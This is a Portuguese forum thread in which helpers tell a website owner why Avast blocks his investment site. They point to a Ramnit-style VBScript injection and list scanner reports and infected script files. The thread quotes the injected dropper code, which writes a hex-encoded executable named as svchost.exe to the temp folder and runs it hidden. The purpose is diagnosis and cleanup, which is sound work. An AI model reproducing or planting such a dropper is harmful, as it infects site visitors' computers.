o avast esta a bloquear meu site o que eu faço ? sempre que eu ou outro usuario deseja entrar no site temos que esta a desativar o avast ,me ajudem por favor , o site è esse hxtp://hemerichinvestimento.com/ ,desde ja obrigado …
Para verificar se um site está limpo, utilize:
http://dnscheck.pingdom.com
http://www.siteadvisor.com
Para verificar se um site está hospedado em afraid.org, vá para http://freedns.afraid.org/ e digite o URL na caixa do canto superior direito e, depois, clique no botão “Trace”. Qualquer domínio hospedado em afraid.org pode ser utilizado por outras pessoas para hospedagem (DNS hosting) sem o seu controle. Se isto acontecer com o seu domínio, ele pode ter sido utilizado para finalidades maliciosas. Neste caso, quando ninguém tem o controle dos subdomínios (DNS hijacking), o avast! bloqueia todo o domínio para proteger os seus usuários. Provavelmente, a solução será trocar a hospedagem do DNS e voltar a nos informar (www.avast.com/contact-form.php).
Hello,
after closing html tag, there is malicious code – see attached image.
Milos
Domínio consultado: www.hemerichinvestimento.com
ns1.afraid.org não foi encontrado na lista de nomes.
nao foi encontrado no afraid.org e agora ?
A Detecção é correta
foi detectado um código do iframe malicioso como disse Milos
http://i.imgur.com/nRGehTJ.png
41 arquivos maliciosos
http://quttera.com/detailed_report/hemerichinvestimento.com
•VBScript Injection (GJS174)
mais oque eu posso fazer para consertar isso ,gastei tanto dinheiro para colocar esse site no ar 
me ajudar por favor ,ja tenho a cabeça a doer rsrs ,desculpa chatear tanto ,porque quero passar segurança para as pessoas que entrar no site ,e ainda mais um site de investimentos …
você é administrador do site
faça a limpeza
570 Set FSO = CreateObject(“Scripting.FileSystemObject”)
571 DropPath = FSO.GetSpecialFolder(2) & “" & DropFileName
572 If FSO.FileExists(DropPath)=False Then
573 Set FileObj = FSO.CreateTextFile(DropPath, True)
574 For i = 1 To Len(WriteData) Step 2
575 FileObj.Write Chr(CLng(”&H" & Mid(WriteData,i,2)))
576 Next
577 FileObj.Close
578 End If
579 Set WSHshell = CreateObject(“WScript.Shell”)
580 WSHshell.Run DropPath, 0
//-->
sim.mas inicio da linha do código começa a aqui e termina onde mencionei acima
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000219891FC65F9FFAF65F9FFAF65F9FFAFA3E6A2AF67F9FFAFE246E6AF25F8FFAFDABCA0AF78F9FFAF87B0A0AF64F9FFAFA6F6A0AF47F9FFAF7EB4F0AF69F9FFAFB75BA5… 163465 bytes are skipped …
sim.mas inicio da linha do código começa a aqui e termina onde mencionei acima
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000219891FC65F9FFAF65F9FFAF65F9FFAFA3E6A2AF67F9FFAFE246E6AF25F8FFAFDABCA0AF78F9FFAF87B0A0AF64F9FFAFA6F6A0AF47F9FFAF7EB4F0AF69F9FFAFB75BA5… 163465 bytes are skipped …
[/quote]
ok obrigado ,mais deixa eu fazer uma pergunta eu tenho que limpar isso no codigo fonte do script ou nos arquivos ftp eu consigo apagar isso ,se fosse eu a fazer claro ,tenho acesso ao cpanel e nos arquivos ftp ,mais nao tenho acesso ao codigo fonte do script ,desculpa chatear
Remova o código
se este mesmo arquivos esta localizado na pasta FTP
Depois irei analisar para saber se site foi limpo e se possui o alerta da detecção
desculpa a chatear ,nao conseguir encontrar ,nem sei por onde começar ,ea pessoa que me veneu o script nao m responde pra dar uma assistençia ,uma obs: fiz um teste hoje desistalei o avast e instalei outro antivirus e nao acusam nada roda normalmente …mais assim como eu milhoes de pessoas preferem o avast
Não podemos desbloquear uma URL que esta infectada com Worm infectante ,um arquivo de VBS Script.
Os usuários do avast estão bem protegidos. Mudar de antivírus,acham que vão resolver o problema, é uma ideia inútil.
VBScript é semelhante em função de JavaScript. Ele é usado para escrever funções executáveis que são incorporados ou incluídos a partir de páginas HTML e interagir com o Document Object Model (DOM) da página, para executar tarefas não possíveis em HTML sozinho.
VBScript também é usado para o processamento do lado do servidor de páginas web, mais notavelmente com o Microsoft Active Server Pages (ASP). O motor ASP e tipo biblioteca, asp.dll, invoca vbscript.dll para executar scripts VBScript. VBScript que está incorporado em uma página ASP está contido dentro de <% e%> trocas de contexto. O exemplo a seguir de uma página ASP com VBScript exibe o atual
sim mais eu nao mudei de antivirus so desinstalei para fazer teste eu disse, eu e melhoes referem o avast .Desculpa se disse algo de mais ,so queria resolver meu problema ,para começar a partilhar e divulgar meu site ,so q nao estou conseguindo ,aliaz nao sei nem por onde começar so queria que meu site estivesse nos conformes ,de boa eo cara que me vendeu nao me da assistençia desculpa o encomodo ai è que sou meio fraco quanto a resolver esses tipos de problemas
ate o google me bloqueou o site ,voçe nao pode me ajudar ?
Eles agiram da maneira correta
o Avast detecta como VBS:Agent-KZ[trj] é legitimo não é um falso positivo
detectado código malicioso
comodo detectou Virus.VBS.Ramnit.c
http://app.webinspector.com/public/reports/21952964
Foi adicionado a lista negra
Esta infecção foi descoberto e os fornecedores de antivírus adicionou a sua detecção em seus bancos de dados de vírus
veja em anexo.
http://sitecheck.sucuri.net/results/www.hemerichinvestimento.com
http://www.hemerichinvestimento.com/assets/js/jquery.js
hxxp://www.hemerichinvestimento.com/banner/scripts/jquery.mobile.customized.min.js
hxxp://www.hemerichinvestimento.com/banner/scripts/jquery.easing.1.3.js
hxxp://www.hemerichinvestimento.com/banner/scripts/camera.min.js
hxxp://www.hemerichinvestimento.com/assets/js/google-code-prettify/prettify.js
hxxp://www.hemerichinvestimento.com/assets/js/transition.js
hxxp://www.hemerichinvestimento.com/assets/js/alert.js
hxxp://www.hemerichinvestimento.com/assets/js/modal.js
hxxp://www.hemerichinvestimento.com/assets/js/dropdown.js
esta infectado
http://zulu.zscaler.com/submission/show/d8555b7124a4e6bdf76a9a20766bc964-1400375529
valeu ai ,entao meu site ja era neh ,que mer… gastei tanto tempo e dinheiro com isso
me diz oq fazer pra tentar consertar isso ,onde eu vou seila ,to perdido…
eu fiz a limpeza atravez do cpanel ,nao sei s fiz bem pode dar uma olhada se continua a mesma coisa ou se mudou algo? porfavor ,obrigado